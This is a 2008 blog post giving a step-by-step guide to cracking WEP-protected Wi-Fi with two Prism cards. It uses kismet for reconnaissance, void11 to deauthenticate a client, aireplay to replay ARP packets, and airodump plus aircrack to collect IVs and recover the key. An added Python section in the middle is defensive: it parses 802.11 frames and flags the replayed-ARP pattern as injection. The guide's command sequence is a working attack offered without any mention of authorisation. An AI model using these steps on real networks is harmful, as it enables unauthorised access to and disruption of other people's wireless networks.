Monday, July 21, 2008

WEP Cracking

This is a guide I wrote a couple of years back, as you can tell, since Security Auditor has been BackTrack for over a year now. Most information still holds true.
Needed:
2 Prism 2/2.5/3 wireless cards
2 computers running Security Auditor

Key
# means channel number
PC means the AP’s client MAC address
AP means AP’s MAC address

Let's begin

Computer 1

Start up kismet

Press s to sort the APs

Press Enter on the AP you're attacking and get the following info:
-Channel
-SSID
-BSSID

Press x to exit

Press Shift + C to get the following information:
-PC

Exit kismet

Open a terminal and run the following commands
switch-to-hostap
cardctl eject
cardctl insert
iwconfig wlan0 channel #
iwpriv wlan0 hostapd 1
iwconfig wlan0 mode master
void11_penetration -D -s PC -B AP wlan0

Computer 2

Open a terminal and run the following commands
switch-to-wlanng
cardctl eject
cardctl insert
monitor.wlan wlan0 #
cd /ramdisk
aireplay -i wlan0 -b AP -m 68 -n 68 -d ff:ff:ff:ff:ff:ff

You need a packet that looks like this:
FromDS - 0
ToDS - 1
BSSID - AP
Source MAC - PC
Destination MAC - ff:ff:ff:ff:ff:ff

Press y to replay this ARP packet
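The packet shape above (ToDS=1, FromDS=0, WEP, broadcast destination, 68 bytes) is also what a wireless IDS keys on, because a real station never resends the same WEP frame with the same IV hundreds of times. The following is an added defender-side example, not part of the original guide: it decodes the 802.11 header bits the guide refers to, and flags a client MAC whose identical ToDS broadcast frame repeats. The MAC addresses, IVs and frames are constructed placeholders.

```python
from collections import Counter
BROADCAST = "ff:ff:ff:ff:ff:ff"

def mac(b):
    return ":".join(f"{x:02x}" for x in b)

def parse_data_frame(frame):
    """Decode an 802.11 data-frame header (None for anything else). Which address
    is BSSID/SA/DA depends on ToDS/FromDS, which is why the guide keys on those bits."""
    if len(frame) < 24 or (frame[0] >> 2) & 0x3 != 2:  # frame type 2 = data
        return None
    to_ds, from_ds, wep = frame[1] & 1, (frame[1] >> 1) & 1, bool(frame[1] & 0x40)
    a1, a2, a3 = mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22])
    if to_ds and not from_ds:        # station -> AP
        bssid, sa, da = a1, a2, a3
    elif from_ds and not to_ds:      # AP -> station
        da, bssid, sa = a1, a2, a3
    elif not to_ds and not from_ds:  # IBSS / ad hoc
        da, sa, bssid = a1, a2, a3
    else:                            # 4-address WDS frames: not handled here
        return None
    iv = frame[24:27].hex() if wep and len(frame) >= 28 else None
    return {"to_ds": to_ds, "from_ds": from_ds, "bssid": bssid, "sa": sa,
            "da": da, "wep": wep, "iv": iv}

def is_replay_candidate(info):
    """The frame shape the guide replays: WEP data, ToDS=1, FromDS=0, broadcast DA."""
    return (info is not None and info["to_ds"] == 1 and info["from_ds"] == 0
            and info["wep"] and info["da"] == BROADCAST)

def detect_replay(frames, threshold=50):
    """Return (bssid, sa, iv) tuples seen more than `threshold` times. A real station
    picks a fresh IV per frame; one WEP frame with one IV seen hundreds of times is injection."""
    counts = Counter()
    for f in frames:
        info = parse_data_frame(f)
        if is_replay_candidate(info):
            counts[(info["bssid"], info["sa"], info["iv"])] += 1
    return {k: n for k, n in counts.items() if n > threshold}

def build_frame(to_ds, from_ds, a1, a2, a3, iv, body):
    """Constructed test frame: FC, duration, 3 addresses, seq, IV, key-index byte, dummy body."""
    fc1 = (to_ds & 1) | ((from_ds & 1) << 1) | 0x40  # 0x40 = Protected (WEP) bit
    return bytes([0x08, fc1, 0, 0]) + a1 + a2 + a3 + b"\x00\x00" + iv + b"\x00" + body

# Constructed addresses and frames (placeholders, not captured traffic).
AP, CLIENT = "00:11:22:33:44:55", "66:77:88:99:aa:bb"
_ap, _cl, _bc = (bytes.fromhex(m.replace(":", "")) for m in (AP, CLIENT, BROADCAST))
SAMPLE_REPLAY = build_frame(1, 0, _ap, _cl, _bc, b"\x0a\x0b\x0c", b"\x00" * 40)  # 68 bytes
SAMPLE_DOWNLINK = build_frame(0, 1, _bc, _ap, _cl, b"\x0d\x0e\x0f", b"\x00" * 40)
```

Feeding `detect_replay` a stream of real monitor-mode frames instead of the constructed samples turns it into the alert that fires while the guide's replay step is running.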

Computer 1

Since you have the above packet, you can close void11

Open a terminal and run
switch-to-wlanng
cardctl eject
cardctl insert
monitor.wlan wlan0 #
cd /ramdisk
airodump wlan0 cap1

Once you have 100,000 IVs (for 64-bit keys) or 800,000 IVs (for 128-bit keys), exit

Open a terminal
cd /ramdisk
aircrack -f 2 -m AP -n 64/128 -q 3 cap*.cap
(-n is the key length: 64 or 128)

In a while you should have your WEP key
